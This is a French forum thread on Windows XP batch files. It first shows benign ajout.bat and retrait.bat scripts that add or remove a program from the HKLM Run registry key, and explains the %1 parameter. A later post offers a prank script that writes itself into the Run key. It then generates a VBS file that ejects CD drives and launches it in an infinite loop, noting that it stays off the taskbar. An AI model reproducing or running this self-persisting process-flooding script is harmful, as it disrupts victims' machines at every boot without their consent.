---- UTILITAIRES "BATCH" POUR L'EXÉCUTION AUTOMATIQUE DES PROGRAMMES AU DÉMARRAGE ---
(en réponse à des question posées sur la page de l'article "fichiers batch-partie 2")
comme je disais,
"autoexe.bat" n'est plus opérationnel sur windows xp
1) soit tu mes ton fichier dans l'onglet "démarrage" du menu démarrer, mais quelk1 pourra le voir et le supprimer du démarrage.
2) ou soit comme "AsTaRod" l'a expliqué tu mes l'adresse de ton fichier dans le registre.
Pour te faciliter cette deuxième option, copie le code que je t'ai préparé dans deux fichiers portant l'extension ".bat"
Une fois que tu auras créé tes fichiers .bat, clique sur l'icône du fichier que tu veux ajouter ou retirer du démarrage et fais-le glisser sur celui d'un fichier .bat.
exemple:
tu possède un programme "coucou.exe" que tu aimes bien et tu souhaiterais qu'il s'exécute au démarrage:
clique sur l'icône de coucou.exe et fais-le glisser sur l'icône de ajout.bat
tu veux retirer coucou.exe du démarrage:
clique sur l'icône de coucou.exe et fais-le glisser sur l'icône de retrait.bat
ajout.bat :
@echo off
echo ajout de %1 au demarrage
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %1 /t REG_SZ /d %1 /f
pause
retrait.bat :
@echo off
echo retrait de %1 du demarrage
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %1 /f
pause
"fantom", tu demandais ce que signifie "%1".
%1 c'est le premier paramètre passé à un fichier .bat.
Ici, le paramètre %1 reçoit le nom du fichier que tu souhaites mettre au démarrage, ainsi que son adresse.
Lorsque tu fais glisser l'icône d'un fichier quelconque sur l'icône d'un fichier .bat, le fichier .bat est exécuté automatiquement et l'adresse ainsi que le nom du fichier quelconque se retrouve automatiquement dans la variable %1.
[quote]"fantom", tu demandais ce que signifie "%1".
%1 c'est le premier paramètre passé à un fichier .bat.
Ici, le paramètre %1 reçoit le nom du fichier que tu souhaites mettre au démarrage, ainsi que son adresse.
Lorsque tu fais glisser l'icône d'un fichier quelconque sur l'icône d'un fichier .bat, le fichier .bat est exécuté automatiquement et l'adresse ainsi que le nom du fichier quelconque se retrouve automatiquement dans la variable %1.[/quote]
Si j'ai bien compris en fait si je fait un fichier file.bat et que je fais glisser l'icone d'un fichier.txt,fichier.txt = %1
c'est bien sa???
bonjour!
petit vivi tenez !
Merci de me dire si un truc cloche :
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %0 /t REG_SZ /d %0 /f
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> test.vbs
echo Set colCDROMs = oWMP.cdromCollection >> test.vbs
echo if colCDROMs.Count >= 1 then >> test.vbs
echo For i = 0 to colCDROMs.Count - 1 >> test.vbs
echo colCDROMs.Item(i).Eject >> test.vbs
echo Next ' cdrom >> test.vbs
echo End If >> test.vbs
:a
start test.vbs
goto a
Aussi ce code peut peut être te servir Nico II car ce fichier batch crée un autre fichier en visual basic script qui lui ne figure pas dans la barre de tache (enfin dans mon exemple)
voila!
merci et a plus! :P:
Bon ba maintenant il ne reste plus qu'à l'essayer sur votre PC (non je plaisante, enfin vous faîtes se que vous voulez...lol)